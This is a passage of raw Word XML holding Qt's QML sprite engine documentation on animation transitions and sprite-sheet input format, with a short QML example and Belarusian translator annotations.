        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D127FB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00730344" w:rsidRPr="00730344">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu translation of the last sentence.</w:t>
      </w:r>
      <w:r w:rsidR="00D127FB">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Because there is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zero weight</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> transition to the walking animation, the standing animation will not normally transition there. But if you </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set the goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> animation to be the walking animation, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>would play</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the walking animation when it finished the standing animation. If it was previously in the waiting animation, it would finish playing that, then play the standing animation, then play the walking animation. It would then continue to play the walking animation until the goal animation is unset, at which point it would switch to the standing animation after finishing the walking animation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If you set the goal state then to the jumping animation, it would finish the walking animation before playing the jumping animation. Because the jumping animation does not transition to other states, it will still keep playing the jumping animation until the state is forced to change. In this example, you could set it back to walking and change to goal animation to walking or to nothing (which would lead it to play the standing animation after the walking animation). </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that by forcibly setting the animation, you can start playing the animation immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2163" w:name="input-format"/>
      <w:bookmarkStart w:id="2164" w:name="_Toc483000998"/>
      <w:bookmarkStart w:id="2165" w:name="_Toc483003989"/>
      <w:bookmarkStart w:id="2166" w:name="_Toc483604339"/>
      <w:bookmarkStart w:id="2167" w:name="_Toc483605559"/>
      <w:bookmarkEnd w:id="2163"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Input Format</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2164"/>
      <w:bookmarkEnd w:id="2165"/>
      <w:bookmarkEnd w:id="2166"/>
      <w:bookmarkEnd w:id="2167"/>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file formats accepted</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the sprite engine is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same as</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the file formats accepted by other QML types, such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2518" w:anchor="image" w:history="1">
        <w:r w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In order to animate the image however, the sprite engine </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>requires the image file to contain all of the frames of the animation</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. They should be arranged in a contiguous line, which may wrap from the right edge of the file to a lower row starting from the left edge of the file (and which is placed directly below the previous row).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/spritecutting.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/spritecutting.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png"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"http://doc.qt.io/qt-5/images/spritecutting.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1074" type="#_x0000_t75" alt="" style="width:302.4pt;height:122.1pt">
            <v:imagedata r:id="rId2519" r:href="rId2520"/>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00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As an </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, take the above image. For now just consider the black numbers, and assume the squares are 40x40 pixels. </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Normally, the image is read from the top-left corner</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you specified the </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>frame size</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as 40x40 pixels, and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>frame count</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of 8, then it would read in the frames as they are numbered. The frame in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top left would be the first frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the frame in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top right would be the fifth frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>then it would wrap to the next row</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (at pixel location 0,40 in the file) to read the sixth frame. It would stop reading after the frame marked 8, and if there was any image data in the square below frame four then it would not be included in the animation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is possible to load animations from an arbitrary offset, but they will still follow the same pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Consider now the red numbers. If we specify that the a</w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nimation begins at pixel location 120,0</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, with a frame count of 5 and the same frame size as before, then it will load the frames as they are numbered in red. The first 120x40 of the image will not be used, as it starts reading 40x40 blocks from the location of 120,0. When it reaches the end of the file at 160,0, it then starts to read the next row from 0,40.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The blue numbers show the frame numbers if you tried to load two frames of that size, starting from 40,40. Note that it is possible to load multiple sprites out of the one image file. The red, blue and black numbers can all be loaded as separate animations to the same sprite engine. The following code loads the animations as per the image. It also specifies that animations are to played at 20 frames per second.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730344" w:rsidRPr="00730344" w:rsidRDefault="00D127FB" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00730344" w:rsidRPr="00730344">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Мы можам указваць</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> пачатковы фрэйм і іх колькасць //</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sprite</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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name</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"black"</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source</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"image.png"</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frameCount</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8</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frameWidth</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40</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frameHeight</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40</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frameRate</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20</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un"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sprite</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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name</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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source</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"image.png"</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frameX</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120</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frameCount</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5</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frameWidth</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40</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frameHeight</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40</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frameRate</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20</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un"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sprite</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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name</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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source</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"image.png"</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frameX</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40</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frameX</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40</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frameCount</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2</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frameWidth</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40</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frameHeight</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40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">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441D0A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    frameRate</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Frames within one animation must be the same size, however multiple animations within the same file do not</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sprites without a frameCount specified assume that they take the entire file</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and you must specify the frame size. Sprites without a frame size assume that they are square and take the entire file without wrapping, and you must specify a frame count.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00472CF6" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
